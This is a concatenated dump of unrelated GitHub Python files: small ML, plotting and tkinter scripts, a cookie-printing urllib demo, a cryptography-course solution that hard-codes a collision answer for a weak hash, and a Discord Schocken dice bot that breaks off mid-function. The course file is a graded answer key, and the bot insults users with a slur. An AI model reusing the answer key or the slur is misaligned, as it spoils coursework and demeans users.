model(x_test)\nprint('最后的预测值是: ',y_test)\n\n\n\n\n\n\n\n","repo_name":"Rookie1019/data_share","sub_path":"Python总文件夹/刘二大人/LR_model.py","file_name":"LR_model.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"11062253397","text":"import h5py\n\nfname = \"resnet50_weights_tf_dim_ordering_tf_kernels.h5\"\ndfname = \"resnet50_owl.hdf5\"\n\nf = h5py.File(fname, 'r')\ndata_file = h5py.File(dfname, 'w')\n\nfor node_name in f.keys():\n for param in f[node_name].keys():\n conv_weight = f[node_name][param].value.tolist()\n data_file.create_dataset(param, data=conv_weight)\n\nf.close()\ndata_file.close()\n\n","repo_name":"pvdhove/owl-resnet","sub_path":"weights/save_weights.py","file_name":"save_weights.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"11543348972","text":"import tkinter\r\nfrom math import *\r\nfrom random import *\r\n\r\nSCREEN_SIZE = (600, 600)\r\n\r\n\r\ndef xs(x):\r\n return SCREEN_SIZE[0] // 2 + x\r\ndef oxs(x):\r\n return -SCREEN_SIZE[0] // 2 + x\r\n\r\ndef ys(y):\r\n return SCREEN_SIZE[1] // 2 - y\r\ndef oys(y):\r\n return -y+SCREEN_SIZE[1] // 2\r\n\r\n\r\nmain = tkinter.Tk()\r\ncanvas = tkinter.Canvas(main, bg='white', height=SCREEN_SIZE[1], width=SCREEN_SIZE[0])\r\n\r\n\r\nclass Vektor:\r\n def __init__(self, x=None, y=None, l=None, a=None):\r\n if x is not None and y is not None:\r\n self.x = x\r\n self.y = y\r\n elif l is not None and a is not None:\r\n self.x = l\r\n self.y = 0\r\n if a != 0:\r\n v1 = self.rotate(a)\r\n self.x = v1.x\r\n self.y = v1.y\r\n\r\n def rotate(self, a):\r\n a = a / 180 * pi\r\n x = self.x * cos(a) - self.y * sin(a)\r\n y = self.x * sin(a) + self.y * cos(a)\r\n return Vektor(x, y)\r\n\r\n def __add__(self, other):\r\n if isinstance(other, Vektor):\r\n return Vektor(x=(self.x + other.x), y=(self.y + other.y))\r\n\r\n def __neg__(self):\r\n return Vektor(x=-self.x, y=-self.y)\r\n\r\n def __sub__(self, other):\r\n return self + (-other)\r\n\r\n\r\nclass nugolnik:\r\n def __init__(self):\r\n self.ss = []\r\n self.ox = 0\r\n self.oy = 0\r\n self.alpha = 0\r\n self.item = None\r\n\r\n def rotate(self, alpha):\r\n # alpha\r\n ss1 = [0] * len(self.ss)\r\n ov = Vektor(x=self.ox, y=self.oy)\r\n for i in range(0, len(self.ss), 2):\r\n v = Vektor(x=self.ss[i], y=self.ss[i + 1])\r\n v = v - ov\r\n v = v.rotate(alpha)\r\n v = v + ov\r\n ss1[i] = v.x\r\n ss1[i + 1] = v.y\r\n return ss1\r\n\r\n def scale(self, k):\r\n ss1 = [0] * len(self.ss)\r\n ov = Vektor(x=self.ox, y=self.oy)\r\n for i in range(0, len(self.ss), 2):\r\n v = Vektor(x=self.ss[i], y=self.ss[i + 1])\r\n v = v - ov\r\n v.x *= k\r\n v.y *= k\r\n v = v + ov\r\n ss1[i] = v.x\r\n ss1[i + 1] = v.y\r\n return ss1\r\n\r\n def draw(self):\r\n ss1 = [0] * len(self.ss)\r\n for i in range(0, len(self.ss), 2):\r\n ss1[i]=xs(self.ss[i])\r\n ss1[i+1]=ys(self.ss[i+1])\r\n if len(self.ss)>0:\r\n if self.item is None:\r\n self.item = canvas.create_polygon(ss1, outline='red', fill='white')\r\n else:\r\n canvas.coords(self.item,ss1)\r\n return self.item\r\n\r\n def change_rotation_point(self,x,y):\r\n self.ox=oxs(x)\r\n self.oy=oys(y)\r\n\r\n def add_point(self,x,y):\r\n self.ss.append(oxs(x))\r\n self.ss.append(oys(y))\r\n self.draw()\r\n\r\npoly = nugolnik()\r\n\r\ndef rotPoint(event):\r\n print(event)\r\n canvas.create_oval(event.x - 2, event.y - 2, event.x + 2, event.y + 2, fill=\"red\")\r\n poly.change_rotation_point(event.x,event.y)\r\n\r\ndef addPoint(event):\r\n poly.add_point(event.x,event.y)\r\n\r\ncanvas.bind('', rotPoint)\r\ncanvas.bind('', addPoint)\r\ndef leftKey(event):\r\n poly.ss = poly.rotate(-0.5)\r\n poly.draw()\r\n\r\ndef rightKey(event):\r\n poly.ss = poly.rotate(0.5)\r\n poly.draw()\r\ndef upKey(event):\r\n poly.ss = poly.scale(1.25)\r\n poly.draw()\r\ndef downKey(event):\r\n poly.ss = poly.scale(0.8)\r\n poly.draw()\r\n\r\ndef rotate(alpha, s):\r\n poly.draw()\r\n\r\nmain.bind('',leftKey)\r\nmain.bind('',rightKey)\r\nmain.bind('',upKey)\r\nmain.bind('',downKey)\r\n\r\n\r\ncanvas.pack()\r\nmain.mainloop()\r\n","repo_name":"jshhh/projects","sub_path":"task1.2.py","file_name":"task1.2.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40589436424","text":"import matplotlib.pyplot as plt\n\n\ndef text(x, y, text):\n plt.text(x, y, text,\n fontsize=15,\n color=\"#f8f9fa\")\n\n\nimg = plt.imread(\"../Graphics/problema_10.png\")\nplt.imshow(img)\nplt.fill_between([0, 543], [454, 454],\n color=\"grey\",\n alpha=0.3)\ntext(300, 445, \"A\")\ntext(285, 385, \"B\")\ntext(365, 388, \"C\")\ntext(291, 318, \"D\")\ntext(259, 245, \"F\")\ntext(441, 266, \"E\")\ntext(91, 146, \"H\")\ntext(136, 46, \"J\")\ntext(285, 180, \"I\")\ntext(420, 223, \"G\")\nplt.axis(\"off\")\nplt.tight_layout()\nplt.savefig(\"../Graphics/map.png\", dpi=500)\n","repo_name":"giovannilopez9808/CIMAT_primer_semestre","sub_path":"Analisis_de_datos/Tarea_06/Team_Document/Scripts/Graphics_problem_10.py","file_name":"Graphics_problem_10.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31598603693","text":"lar = float(input('Digite a largura da parede: '))\nalt = float(input('Digite a altura da parede: '))\nar = lar * alt\nlt = ar / 2\nprint('A area total da parede é {} m², e será necessario {} Lt de tinta'.format(ar, lt))\n\n\n\n# Largura em Metros\n# Altura em Metros\n# Area é = largura * altura\n# Cada Lt de tinta, pinta 2 m²\n# indica quant necessaria de tinta area / 2","repo_name":"vinicciusnev/Python-Curso-em-video","sub_path":"Aula15.py","file_name":"Aula15.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"29359450386","text":"#11\n#extracting cookies\nimport urllib\nimport http.cookiejar\n\n\nurl=\"http://www.youtube.com\"\ndef extract_cookies():\n cookie_jar=http.cookiejar.CookieJar()\n url_opener=urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))\n url_opener.open(url)\n for cookie in cookie_jar:\n print(\"[cookie name=%s] --[Cookie value=%s]\" %(cookie.name,cookie.value))\n \n \nif __name__==\"__main__\":\n extract_cookies()\n","repo_name":"Prajwalnazre/APS-2020","sub_path":"cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"18790948893","text":"import sys\ninputStringFile = sys.argv[1]\noutputFile = sys.argv[2]\n\nwith open(inputStringFile) as f:\n inputString = f.read().strip()\nf.close()\n\ndef WHA(inStr):\n mask = 0x3FFFFFFF\n outHash = 0\n\n for byte in inStr:\n byte = ord(byte)\n intermediate_value = ((byte ^ 0xCC) << 24) | ((byte ^ 0x33) << 16) | ((byte ^ 0xAA) << 8) | (byte ^ 0x55)\n outHash = (outHash & mask) + (intermediate_value & mask)\n\n outHash = hex(outHash)[2:]\n return outHash\n\n#print(WHA(inputString))\n#print(WHA(\"OBVE A TEA CAKE REMEMBER THIS FRENCH NAME OF A GROUP OF ISLANDS IN THE GULF OF ST LAWRENCE\"))\n\nanswer = \"OBVE A TEA CAKE REMEMBER THIS FRENCH NAME OF A GROUP OF ISLANDS IN THE GULF OF ST LAWRENCE\"\n\nf = open(outputFile, 'w')\nf.write(answer)\nf.close()","repo_name":"shozabhussain/CS473","sub_path":"Assignment 1 - Cryptography/Submission/sol_3.1.6.py","file_name":"sol_3.1.6.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74001878679","text":"import pandas as pd\nfrom other_codes.not_used.visuals_functions import plot_prediction\n\npd.pandas.set_option(\"display.max_columns\", None)\npd.set_option(\"expand_frame_repr\", False)\npd.set_option(\"precision\", 2)\n\nsource_root = \"outputs\"\ntest_file_name = \"test_results_extrw90_patsize30.csv\"\n\nsell_trash = 1.6\nhold_trash_per = [0.5, 1.6]\nbuy_trash = 0.5\n\ntry:\n\n df = pd.read_csv(f\"{source_root}/{test_file_name}\")\n plot_prediction(df, sell_trash, hold_trash_per, buy_trash, test_file_name)\n\n\nexcept FileNotFoundError:\n print(\"Файл для анализа предсказаний с учетом профита отсутсвует\")\n","repo_name":"ma2sevich222/siamese_networks_for_stock_data_paterns_recognition","sub_path":"other_codes/not_used/pred_analysis.py","file_name":"pred_analysis.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"32822658601","text":"import os\nimport signal\n\nfrom .exceptions import (\n SpielLaeuft,\n SpielLaeuftNicht,\n FalscherSpielBefehl,\n FalscheAktion,\n PermissionError,\n FalscherSpieler,\n ZuOftGeworfen,\n NochNichtGeworfen,\n LustWurf,\n SpielerMussWuerfeln,\n)\nfrom .spiel import SchockenSpiel\nfrom . import wurf\nfrom discord.utils import get\nfrom copy import deepcopy\nimport random\n\n\nclass SchockenBot:\n def __init__(self, client):\n self.client = client\n # bot will never run on any other server than Café A\n self.guild = client.guilds[0]\n self.schock_channel_name = \"schocktresen\"\n self.valid_guild_name = \"Café A\"\n self.game_running = False\n self._all_member_names = [member.name for member in self.guild.members]\n self._start_game_cmd = \"schocken\"\n self._end_game_cmd = \"beenden\"\n self._restart_cmd = \"neustart\"\n self._wuerfel_emoji_names = dict(\n [\n (1, \"wuerfel_1\"),\n (2, \"wuerfel_2\"),\n (3, \"wuerfel_3\"),\n (4, \"wuerfel_4\"),\n (5, \"wuerfel_5\"),\n (6, \"wuerfel_6\"),\n ]\n )\n self.discord_to_game_cmd_dict = {\n \"einwerfen\": \"einwerfen\",\n \"wuerfeln\": \"wuerfeln\",\n \"würfeln\": \"wuerfeln\",\n \"stechen\": \"stechen\",\n \"weiter\": \"weiter\",\n \"beiseite\": \"beiseite\",\n }\n\n self.game_to_discord_cmd_dict = {\n v: k for k, v in self.discord_to_game_cmd_dict.items()\n }\n\n self._halbzeit_state_names = {\n 1: \"halbzeit_erste\",\n 2: \"halbzeit_zweite\",\n 3: \"finale\",\n }\n\n self._lustwuerfe_runde = dict()\n\n def emoji_by_name(self, name):\n emoji = get(self.guild.emojis, name=name)\n return str(emoji)\n\n def name_to_member(self, name):\n member = get(self.guild.members, name=name)\n return member\n\n def wurf_to_emoji(self, wuerfe, einsen=0):\n if einsen > 0:\n out = \"\"\n rest = [self._wuerfel_emoji_names[w] for w in wuerfe[: 3 - einsen]]\n out += \" \".join([self.emoji_by_name(r) for r in rest])\n out += \" **|**\"\n for _ in range(einsen):\n out += f\" {self.emoji_by_name(self._wuerfel_emoji_names[1])}\"\n else:\n emoji_names = [self._wuerfel_emoji_names[w] for w in wuerfe]\n out = \" \".join([self.emoji_by_name(n) for n in emoji_names])\n return out\n\n def discord_to_game_cmd(self, discord_cmd):\n try:\n game_cmd = self.discord_to_game_cmd_dict[discord_cmd]\n return game_cmd\n except KeyError:\n raise FalscherSpielBefehl\n\n def spieler_by_name(self, name, spielerliste):\n spieler = next(sp for sp in spielerliste if sp.name == name)\n return spieler\n\n def replace_names_by_mentions(self, string):\n for name in self._all_member_names:\n member = self.name_to_member(name)\n string = string.replace(name, member.mention)\n return string\n\n def mention_mit_deckel(self, spieler):\n name = spieler.name\n deckel = spieler.deckel\n deckel_emoji = self.emoji_by_name(\"kronkorken\")\n out = f\"{self.name_to_member(name).mention} ({deckel} {deckel_emoji})\"\n return out\n\n def command_in_schock_channel(self, message):\n msg_text = message.content\n channel = message.channel\n correct_channel = channel.name == self.schock_channel_name\n is_command = msg_text.startswith(\"!\")\n is_not_restart = self._restart_cmd not in msg_text\n return correct_channel and is_command and is_not_restart\n\n def restart_issued(self, message):\n msg_text = message.content\n return msg_text == f\"!{self._restart_cmd}\"\n\n async def parse_input(self, message):\n # all messages from channels with read permissions are read\n msg_text = message.content\n channel = message.channel\n try:\n if self.command_in_schock_channel(message):\n command = msg_text.split(\"!\")[-1]\n if command == self._start_game_cmd:\n # TODO Status auf Spiel läuft setzten\n if self.game_running:\n raise SpielLaeuft\n else:\n self.game_running = True\n self.game = SchockenSpiel()\n msg = f\"{message.author.mention} will schocken. \"\n msg += \"`!einwerfen` zum mitmachen\"\n await self.print_to_channel(channel, msg)\n\n elif command == self._end_game_cmd:\n # TODO Status auf Spiel beendet setzten\n if self.game_running:\n msg = f\"{message.author.mention} hat das Spiel beendet\"\n self.game_running = False\n await self.print_to_channel(channel, msg)\n else:\n raise SpielLaeuftNicht\n\n elif command == \"ICH WILL UNREAL TOURNAMENT SPIELEN\":\n msg = \"Dann geh doch\"\n await self.print_to_channel(channel, msg)\n link = \"https://tenor.com/view/unreal-tournament\"\n link += \"-kid-unreal-unreal-kid-rage-gif-16110833\"\n await self.print_to_channel(channel, link)\n\n else:\n if not self.game_running:\n raise SpielLaeuftNicht\n # actual game\n await self.handle_game(message)\n\n elif self.restart_issued(message):\n role_strs = [str(role) for role in message.author.roles]\n if \"developer\" not in role_strs:\n raise PermissionError\n msg = f\"👋 Bis gleich! :wave:\"\n await self.print_to_channel(channel, msg)\n await self.client.logout()\n os.kill(os.getpid(), signal.SIGINT)\n\n except NotImplementedError:\n msg = \"Das geht leider noch nicht. (Nicht implementiert)\"\n msg += \"\\n Spiel wird beendet.\"\n await self.print_to_channel(channel, msg)\n self.game_running = False\n del self.game\n\n except PermissionError:\n msg = \"Das darfst du nicht, DU HURENSOHN!\"\n msg += f\"{self.emoji_by_name('king')}\"\n await self.print_to_channel(channel, msg)\n\n except SpielLaeuftNicht:\n msg = f\"Gerade läuft kein Spiel. \"\n msg += f\"`!{self._start_game_cmd}` zum starten\"\n await self.print_to_channel(channel, msg)\n\n except SpielLaeuft:\n msg = f\"Es läuft bereits ein Spiel. \"\n msg += \"Versuch's mal mit `!einwerfen`.\"\n await self.print_to_channel(channel, msg)\n\n except FalscherSpielBefehl:\n msg = \"Diesen Befehl gibt es nicht. \"\n await self.print_to_channel(channel, msg)\n\n except FalscherSpieler as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Das darfst du gerade nicht (Falsche Spielerin).\"\n await self.print_to_channel(channel, msg)\n\n except ZuOftGeworfen as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Du darfst nicht nochmal!\"\n await self.print_to_channel(channel, msg)\n\n except FalscheAktion as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Das darfst du gerade nicht. (Falsche Aktion)\"\n await self.print_to_channel(channel, msg)\n\n except NochNichtGeworfen as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Es muss erst gewuerfelt werden!\"\n await self.print_to_channel(channel, msg)\n\n except NochNichtGeworfen as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Es muss erst gewuerfelt werden!\"\n await self.print_to_channel(channel, msg)\n\n except SpielerMussWuerfeln as e:\n if str(e):\n msg = self.replace_names_by_mentions(str(e))\n else:\n msg = \"Es muss erst gewuerfelt werden!\"\n await self.print_to_channel(channel, msg)\n\n async def print_to_channel(self, channel, text):\n return await channel.send(text)\n\n async def handle_game(self, message):\n msg_text = message.content\n msg_channel = message.channel\n msg_author = message.author\n command = msg_text.split(\"!\")[-1]\n msg_author_name = msg_author.name\n\n # freeze old game state. some properties are needed for the bot\n self.game_old = deepcopy(self.game)\n\n # run game state machine\n game_cmd = self.discord_to_game_cmd(command)\n is_lustwurf = False\n try:\n self.game.command_to_event(msg_author_name, game_cmd)\n except LustWurf:\n is_lustwurf = True\n\n leaf_state_str = self.game.state.leaf_state.name\n\n if leaf_state_str == \"einwerfen\":\n spieler = self.spieler_by_name(\n msg_author_name, self.game.einwerfen.spieler_liste\n )\n if command == \"einwerfen\":\n # wurf darstellen nach !einwerfen\n wurf_emoji = self.wurf_to_emoji(spieler.augen)\n out_str = f\"{message.author.mention} hat eine \"\n out_str += f\"{wurf_emoji} geworfen.\"\n await self.print_to_channel(msg_channel, out_str)\n\n if self.game.einwerfen.stecher_count > 1:\n # bei keinem weiteren einwerfen muss gestochen werden\n stecher_wurf = self.game.einwerfen.stecher_liste[0].augen\n wurf_emoji = self.wurf_to_emoji(stecher_wurf)\n\n out_str = \", \".join(\n [\n self.name_to_member(pl.name).mention\n for pl in self.game.einwerfen.stecher_liste\n ]\n )\n out_str += f\" haben eine {wurf_emoji} geworfen.\\n\"\n out_str += \"`!stechen` um zu stechen oder auf\"\n out_str += \"weiteres `!einwerfen` warten\"\n await self.print_to_channel(msg_channel, out_str)\n\n else:\n # es muss momentan nicht gestochen werden,\n # spiel kann anfangen\n if len(self.game.einwerfen.spieler_liste) > 1:\n # spiel faengt erst an, wenn mehr als ein spieler\n # eingeworfen hat\n anfaenger = self.game.einwerfen.stecher_liste[0]\n anf_member = self.name_to_member(anfaenger.name)\n anf_wurf = anfaenger.augen\n wurf_emoji = self.wurf_to_emoji(anf_wurf)\n\n out_str = f\"{anf_member.mention} hat mit einer \"\n out_str += f\"{wurf_emoji} den niedgristen Wurf. \"\n out_str += \"\\n`!wuerfeln` um das Spiel zu beginnen \"\n out_str += \"oder auf weiteres `!einwerfen` warten.\"\n await self.print_to_channel(msg_channel, out_str)\n else:\n pass\n\n elif leaf_state_str == \"stechen\":\n spieler = self.spieler_by_name(\n msg_author_name, self.game.einwerfen.spieler_liste\n )\n if command == \"stechen\":\n # wurf darstellen\n out_str = f\"{message.author.mention} sticht mit einer \"\n out_str += f\"{self.wurf_to_emoji(spieler.augen)}.\"\n await self.print_to_channel(msg_channel, out_str)\n\n stecher = self.game.einwerfen.stecher_liste\n gestochen = self.game.einwerfen.gestochen_liste\n noch_stechen = [s for s in stecher if s not in gestochen]\n\n if len(stecher) > 1:\n noch_st_members = [\n self.name_to_member(pl.name) for pl in noch_stechen\n ]\n noch_st_mentions = [m.mention for m in noch_st_members]\n out_str = \", \".join(noch_st_mentions)\n muss = \"muss\" if len(noch_stechen) == 1 else \"müssen\"\n out_str += f\" {muss} `!stechen`.\"\n\n else:\n anfaenger = self.game.einwerfen.stecher_liste[0]\n anf_wurf = anfaenger.augen\n wurf_emoji = self.wurf_to_emoji(anf_wurf)\n out_str = f\"{self.name_to_member(anfaenger.name).mention} \"\n out_str += f\"hat mit einer {wurf_emoji} den niedrigsten Wurf. \"\n out_str += \"`!wuerfeln` um das Spiel zu beginnen.\"\n\n await self.print_to_channel(msg_channel, out_str)\n\n elif leaf_state_str == \"wuerfeln\":\n outputs = []\n # Vorbereitungen\n # in welcher halbzeit sind wir gerade?\n stack_list = list(self.game.state_stack.deque)\n stack_names = [st.name for st in stack_list]\n num_halbzeit = stack_names.count(\"Halbzeit\") + 1\n # in welcher halbzeit waren wir\n stack_list_old = list(self.game_old.state_stack.deque)\n stack_names_old = [st.name for st in stack_list_old]\n num_halbzeit_old = stack_names_old.count(\"Halbzeit\") + 1\n # entsprechend halbzeit_erste oder halbzeit_zweite oder finale aus\n # game holen\n halbzeit = getattr(self.game, self._halbzeit_state_names[num_halbzeit])\n spieler = self.spieler_by_name(msg_author_name, halbzeit.initiale_spieler)\n # Alle spezialfälle abfragen\n # kommen wir aus einwerfen?\n is_aus_einwerfen = str(self.game_old.state).split()[1] == \"Einwerfen\"\n is_neue_halbzeit = num_halbzeit != num_halbzeit_old\n # zug vorbei\n max_wuerfe = halbzeit.rdm.num_maximale_wuerfe\n is_zug_vorbei = max_wuerfe == 1 or spieler != halbzeit.aktiver_spieler\n # halbzeit vorbei > runde vorbei > zug vorbei\n if not is_aus_einwerfen:\n halbzeit_old = getattr(\n self.game_old, self._halbzeit_state_names[num_halbzeit_old]\n )\n spieler_old = self.spieler_by_name(\n msg_author_name, halbzeit_old.spieler_liste\n )\n\n if is_lustwurf:\n try:\n old_lustwuerfe = self._lustwuerfe_runde[spieler.name]\n except KeyError:\n old_lustwuerfe = 0\n self._lustwuerfe_runde.update({spieler.name: old_lustwuerfe + 1})\n if halbzeit.rdm.zahl_deckel_im_topf == 0:\n if halbzeit_old.rdm.zahl_deckel_im_topf == 1 and is_lustwurf:\n is_verteilen_vorbei = False\n else:\n is_verteilen_vorbei = True\n else:\n is_verteilen_vorbei = False\n alle_lustwuerfe = sum([w for w in self._lustwuerfe_runde.values()])\n # deckel aus mitte verteilt\n if spieler == halbzeit_old.spieler_liste[-1]:\n if is_verteilen_vorbei:\n spieler_tief = halbzeit.spieler_liste[0]\n spieler_tief_old = next(\n sp\n for sp in halbzeit_old.spieler_liste\n if sp.name == spieler_tief.name\n )\n deckel_vorher = spieler_tief_old.deckel\n deckel_neu = spieler_tief.deckel\n try:\n is_runde_vorbei = (\n deckel_vorher - deckel_neu\n ) != alle_lustwuerfe\n except KeyError:\n is_runde_vorbei = deckel_vorher != deckel_neu\n else:\n deckel_vorher = halbzeit_old.rdm.zahl_deckel_im_topf\n deckel_neu = halbzeit.rdm.zahl_deckel_im_topf\n # deckel wurden verteilt, also ist runde vorbei\n alle_lustwuerfe = sum(\n [w for w in self._lustwuerfe_runde.values()]\n )\n is_runde_vorbei = deckel_vorher - deckel_neu != alle_lustwuerfe\n else:\n is_runde_vorbei = False\n else:\n is_runde_vorbei = False\n # erster zug einer runde\n if is_runde_vorbei:\n is_vorlegen = False\n else:\n is_vorlegen = spieler == halbzeit.spieler_liste[0]\n\n if is_vorlegen or is_neue_halbzeit:\n self._lustwuerfe_runde = dict()\n\n if command in [\"wuerfeln\", \"würfeln\"]:\n if is_lustwurf and not is_neue_halbzeit:\n mem = self.name_to_member(spieler.name)\n abgeber = None\n for s in halbzeit_old.spieler_liste:\n sp_neu = self.spieler_by_name(s.name, halbzeit.spieler_liste)\n if s.deckel > sp_neu.deckel:\n abgeber = s\n\n out_str = f\"Das war ein Lustwurf, {mem.mention}. \"\n out_str += \"Hier hast du einen \"\n out_str += f\"{self.emoji_by_name('kronkorken')} \"\n if abgeber is None:\n out_str += \"aus der Mitte.\"\n else:\n abg_mem = self.name_to_member(abgeber.name)\n out_str += f\" von {abg_mem.mention}.\"\n outputs.append(out_str)\n # ggf output vor eigentlichem wurf\n if is_aus_einwerfen:\n # erster output fuer erste halbzeit\n num_halbzeit = 1\n sp_liste = halbzeit.spieler_liste\n outputs.append(\n self.gen_enter_halbzeit_output(sp_liste, num_halbzeit)\n )\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=False, einsen=0,\n )\n )\n\n elif is_neue_halbzeit:\n # erster zug der neuen halbzeit\n spieler_old = self.spieler_by_name(\n spieler.name, halbzeit_old.spieler_liste\n )\n einsen = spieler_old.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit_old, reicht_comment=False, einsen=einsen,\n )\n )\n outputs.append(self.gen_halbzeit_vorbei_output(halbzeit))\n sp_liste = halbzeit.spieler_liste\n outputs.append(\n self.gen_enter_halbzeit_output(sp_liste, num_halbzeit)\n )\n\n elif is_vorlegen:\n if is_zug_vorbei:\n spieler_old = self.spieler_by_name(\n spieler.name, halbzeit_old.spieler_liste\n )\n einsen = spieler_old.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=False, einsen=einsen\n )\n )\n outputs.append(self.gen_nach_zug_output(halbzeit, num_halbzeit))\n else:\n einsen = spieler.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=False, einsen=einsen\n )\n )\n\n elif is_runde_vorbei:\n spieler_old = self.spieler_by_name(\n spieler.name, halbzeit_old.spieler_liste\n )\n einsen = spieler_old.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit_old, reicht_comment=True, einsen=einsen\n )\n )\n outputs.append(self.gen_runde_vorbei_output(halbzeit, num_halbzeit))\n\n elif is_zug_vorbei:\n einsen = spieler.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=True, einsen=einsen\n )\n )\n outputs.append(self.gen_nach_zug_output(halbzeit, num_halbzeit))\n\n else:\n einsen = spieler.einsen\n outputs.append(\n self.gen_wuerfel_output(\n spieler, halbzeit, reicht_comment=True, einsen=einsen\n )\n )\n\n elif command == \"weiter\":\n if is_neue_halbzeit:\n outputs.append(self.gen_halbzeit_vorbei_output(halbzeit))\n sp_liste = halbzeit.spieler_liste\n outputs.append(\n self.gen_enter_halbzeit_output(sp_liste, num_halbzeit)\n )\n elif is_runde_vorbei:\n outputs.append(self.gen_runde_vorbei_output(halbzeit, num_halbzeit))\n else:\n outputs.append(self.gen_nach_zug_output(halbzeit, num_halbzeit))\n\n elif command == \"beiseite\":\n halbzeit_attr_name_alt = self._halbzeit_state_names[num_halbzeit]\n halbzeit_alt = getattr(self.game_old, halbzeit_attr_name_alt)\n\n spieler_liste_alt = halbzeit_alt.initiale_spieler\n spieler_alt = self.spieler_by_name(msg_author_name, spieler_liste_alt)\n\n augen_alt = spieler_alt.augen\n num_einsen_neu = spieler.einsen\n\n beiseite = self.gen_beiseite_output(spieler, augen_alt, num_einsen_neu)\n outputs.append(beiseite)\n\n for out_str in outputs:\n await self.print_to_channel(msg_channel, out_str)\n\n elif leaf_state_str == \"anstoßen!\":\n outputs = []\n stack_list = list(self.game.state_stack.deque)\n stack_list_old = list(self.game_old.state_stack.deque)\n finale = stack_list[-1]\n finale_old = stack_list_old[-1]\n fin_namen_liste = [s.name for s in finale.spieler_liste]\n gab_es_finale = len(fin_namen_liste) == len(set(fin_namen_liste))\n if gab_es_finale:\n letzte_halbzeit = finale\n letzte_halbzeit_old = finale_old\n else:\n letzte_halbzeit = stack_list[-2]\n letzte_halbzeit_old = stack_list_old[-2]\n\n hoch, tief = letzte_halbzeit.rdm.hoch_und_tief()\n spieler_liste = [hoch.spieler, tief.spieler]\n\n spieler = self.spieler_by_name(msg_author_name, spieler_liste)\n if command == \"wuerfeln\":\n # einsen = spieler_old.einsen\n einsen = 0\n outputs.append(\n self.gen_wuerfel_output(\n spieler,\n letzte_halbzeit_old,\n reicht_comment=False,\n einsen=einsen,\n )\n )\n\n verl_member = self.name_to_member(tief.spieler.name)\n outputs.append(f\"**{verl_member.mention} verliert damit das Spiel!**\")\n for out_str in outputs:\n await self.print_to_channel(msg_channel, out_str)\n self.game_running = False\n\n def gen_beiseite_output(self, spieler, augen_vorher, num_einsen_nachher):\n w1 = self.emoji_by_name(\"wuerfel_1\")\n w6 = self.emoji_by_name(\"wuerfel_6\")\n\n if augen_vorher.count(6) >= 2:\n sechsen_emoji = \" \".join([w6] * 2)\n umdrehen_out = f\"dreht {sechsen_emoji} zu {w1} um und \"\n else:\n umdrehen_out = \"\"\n\n einsen_emoji = [w1] * num_einsen_nachher\n einsen_emoji = \" \".join(einsen_emoji)\n beiseite_out = f\"legt {einsen_emoji} beiseite. \"\n\n mention = self.mention_mit_deckel(spieler)\n out_str = f\"{mention} {umdrehen_out}{beiseite_out}\"\n\n return out_str\n\n def gen_halbzeit_vorbei_output(self, halbzeit):\n verlierer = halbzeit.spieler_liste[0]\n verl_member = self.name_to_member(verlierer.name)\n out_str = f\"{verl_member.mention} verliert die Halbzeit. \"\n return out_str\n\n def gen_info_header(self, halbzeit, num_halbzeit, neue_runde=False):\n out_str = \"**| \"\n if num_halbzeit < 3:\n halbzeit_str = f\"Halbzeit {num_halbzeit}\"\n else:\n halbzeit_str = f\"Finale \"\n out_str += halbzeit_str\n out_str += \" | \"\n\n deckel_noch = halbzeit.rdm._zahl_deckel_im_topf\n deckel_emoji = self.emoji_by_name(\"kronkorken\")\n if not neue_runde:\n hoch, tief = halbzeit.rdm.hoch_und_tief()\n um_wieviele_gehts = hoch.wurf.deckel_wert\n out_str += f\"Es geht um {um_wieviele_gehts} {deckel_emoji}\"\n out_str += \" | \"\n wuerfe = halbzeit.rdm.num_maximale_wuerfe\n wurf_str = {1: \"Ein Wurf\", 2: \"Zwei Würfe\", 3: \"Drei Würfe\"}\n out_str += f\"{wurf_str[wuerfe]}\"\n\n if deckel_noch > 0:\n out_str += \" | \"\n out_str += f\"Mitte: {deckel_noch} {deckel_emoji}\"\n out_str += \" |**\\n\"\n\n else:\n noch_drin = \", \".join(\n [self.mention_mit_deckel(s) for s in halbzeit.spieler_liste]\n )\n out_str += \" |**\"\n out_str += \"\\n\"\n out_str += f\"Noch im Spiel: \" + noch_drin + \"\\n\"\n return out_str\n\n def gen_nach_zug_output(self, halbzeit, num_halbzeit):\n hoch, tief = halbzeit.rdm.hoch_und_tief()\n naechster = halbzeit.aktiver_spieler\n out_str = self.gen_info_header(halbzeit, num_halbzeit)\n im_wievielten = {1: \"ersten\", 2: \"zweiten\", 3: \"dritten\"}\n\n hoch_1 